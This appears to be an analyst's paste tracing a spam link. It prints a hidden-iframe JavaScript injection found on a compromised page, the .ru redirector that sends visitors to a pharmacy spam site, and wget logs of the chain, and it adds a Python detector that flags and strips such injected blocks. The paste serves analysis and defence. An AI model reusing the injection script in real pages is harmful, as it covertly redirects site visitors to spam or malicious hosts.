unixfreaxjp

Pseudo DNS/A w/injected code (NEW) & tor blocker(NEW)

Sep 20th, 2012

// following spam link....

--15:21:04-- http://192.220.87.172/
=> `index.html'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 1,038 (1.0K) [text/html]
15:21:05 (10.21 KB/s) - `index.html' saved [1038/1038]

// ↑contains...INJECTED code ↓
:
<!--c3284d--><script type="text/javascript">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://wydybpuv.ru/count27.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script><!--/c3284d-->


// following the links.. is the pseudo a/dns record redirector
// domain, let's see where it goes..↓

--15:23:16-- http://wydybpuv.ru/count27.php
=> `count27.php'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... 200
Length: 142 []
Last-modified header invalid -- time-stamp ignored.
15:23:17 (494.72 B/s) - `count27.php' saved [142/142]

//↑contains↓

<!DOCTYPE HTML><html><head><script type="text/javascript">parent.location.href = "http://goherdscan.com/";</script></head><body></body></html>


// following the links..

--15:24:46-- http://goherdscan.com   // tor conns take 1 ... fail..
=> `index.html.1'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... ^C
C:\Program Files\GnuWin32\bin\dump>


--15:25:33-- http://goherdscan.com/   // tor conns take 2 ... fail..
=> `index.html.1'
Connecting to 192.168.7.11:8118... connected.
Proxy request sent, awaiting response... ^C


--15:26:00-- http://goherdscan.com/ // wtf.. get rid of the tor, use bouncer...
=> `index.html.1'
Resolving goherdscan.com... 94.23.242.200
Connecting to goherdscan.com|94.23.242.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
15:26:02 (56.32 KB/s) - `index.html.1' saved [54634]

// ending up with the adult pharma spam sites, below lynx snipped..

My Canadian Pharmacy - Canadian Quality Medications at Affordable Price (p1 of 4)
My Canadian Pharmacy
USD GBP CAD EUR AUD CHF
[search_button.gif]-Submit Enter product name_______
* Men's Health
+ Viagra bestseller
+ Cialis bestseller
+ Viagra Super Active+ bestseller
+ Levitra bestseller
+ Viagra Professional bestseller
+ Viagra Super Force bestseller
+ Cialis Super Active+ bestseller
+ Cialis Professional bestseller
+ Cialis Soft Tabs bestseller
+ Viagra Soft Tabs bestseller
+ Propecia bestseller
+ Super Active ED Pack
+ VPXL
+ Maxaman bestseller
+ View all products
* Pain Relief
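
// Added example, not part of the original paste: a Python check a site owner could run over served HTML to flag and cut out the marker-wrapped off-screen iframe block shown above. The function names, the six-hex-character marker pattern and the placeholder host redirector.example are assumptions made for this illustration.

```python
import re
from urllib.parse import urlparse

# Paired marker comments, e.g. <!--c3284d--> ... <!--/c3284d--> (assumed: six hex chars).
MARKED_BLOCK = re.compile(
    r"<!--(?P<tag>[0-9a-f]{6})-->(?P<body>.*?)<!--/(?P=tag)-->", re.S | re.I)
IFRAME_CREATE = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I)
OFFSCREEN = re.compile(r"\.style\.(?:top|left)\s*=\s*['\"]-\d+(?:px|em|%)?['\"]", re.I)
SRC_ASSIGN = re.compile(r"\.src\s*=\s*['\"](https?://[^'\"]+)['\"]", re.I)

def find_injections(html):
    """Return one finding per marker-wrapped block that builds an iframe."""
    findings = []
    for m in MARKED_BLOCK.finditer(html):
        body = m.group("body")
        if not IFRAME_CREATE.search(body):
            continue  # marker pair without an iframe: not this pattern
        hosts = sorted({urlparse(u).hostname for u in SRC_ASSIGN.findall(body)})
        findings.append({"marker": m.group("tag"), "span": m.span(),
                         "offscreen": bool(OFFSCREEN.search(body)), "hosts": hosts})
    return findings

def strip_injections(html):
    """Remove every flagged block, leaving the rest of the page untouched."""
    out, last = [], 0
    for f in find_injections(html):
        start, end = f["span"]
        out.append(html[last:start])
        last = end
    out.append(html[last:])
    return "".join(out)

# Constructed sample: the paste's block with a placeholder host.
SAMPLE = """<html><body><p>Welcome</p>
<!--c3284d--><script type="text/javascript">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://redirector.example/count.php";
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script><!--/c3284d-->
</body></html>"""

if __name__ == "__main__":
    for f in find_injections(SAMPLE):
        print(f["marker"], f["hosts"], "offscreen" if f["offscreen"] else "visible")
```

// The hosts list is what goes on the proxy/DNS blocklist; removing the block does not close whatever let it be written into the page in the first place.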